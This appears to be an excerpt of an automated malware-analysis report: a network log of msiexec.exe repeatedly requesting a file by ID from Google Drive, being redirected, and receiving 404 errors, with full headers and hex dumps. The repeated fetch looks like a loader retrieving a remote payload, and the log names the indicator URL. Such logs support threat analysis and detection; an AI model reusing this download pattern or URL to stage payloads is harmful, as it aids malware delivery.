                                                                                          2025-01-10 14:17:51 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 67 6e 46 51 7a 31 6e 31 2d 67 67 59 37 4e 78 77 79 38 45 52 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QgnFQz1n1-ggY7Nxwy8ERg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          46192.168.2.650031142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:52 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:53 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:52 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: script-src 'nonce-jjMA3ECDbXFmzh5aNDgphQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          47192.168.2.650032216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:53 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:54 UTC1851INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgTtAQENBuXRdqDUMJSYeG1fS_K-olX84LV8S0Yif-y82c9qG_q0AvKrOsGgkyLzsu4Z3rwUkjM
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:54 GMT
                                                                                          Content-Security-Policy: script-src 'nonce-1V457p-AtP3OzN67UpQIXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:54 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 41 6c 37 63 7a 42 31 5f 49 6d 70 55 7a 56 62 79 64 6b 33 55 72 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Al7czB1_ImpUzVbydk3UrQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          48192.168.2.650033142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:54 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:55 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:55 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: script-src 'nonce-p_r5KBXCk81rxnaIdYnLTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          49192.168.2.650034216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:55 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:56 UTC1851INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFIdbgRiznYI3J0EdjZatKLEDqleogOrRsw2whgfx1Sbeeg47UMHataN5de9ix8sImtnHftMSxlpF38
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:56 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: script-src 'nonce-m6lHwX_tYE6fi_6jU4ZnQg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:56 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 7a 5f 63 47 6e 59 62 42 7a 4e 78 43 71 54 67 38 4a 43 4c 39 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Sz_cGnYbBzNxCqTg8JCL9w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          50192.168.2.650035142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:57 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:58 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:58 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-jOOI8sqjTYWPRTlGn6jkAw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          51192.168.2.650036216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:17:58 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:17:59 UTC1844INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFiumC78cnMeQxiMtzLvvwcOEyCmkpcHSuTOQ0Yzi0ICQeb3je7LyHoGDNGkanFujjf8jpl8
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:17:59 GMT
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-HND_VF4-F29QqCe7GGAXcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:17:59 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 61 31 79 6e 6b 46 32 39 31 55 37 74 57 66 35 48 56 4d 4a 58 48 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="a1ynkF291U7tWf5HVMJXHw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          52192.168.2.650037142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:18:00 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:00 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:00 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-oCaEZO-jPyx1LIQRbmW-Pg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          53192.168.2.650038216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:18:01 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
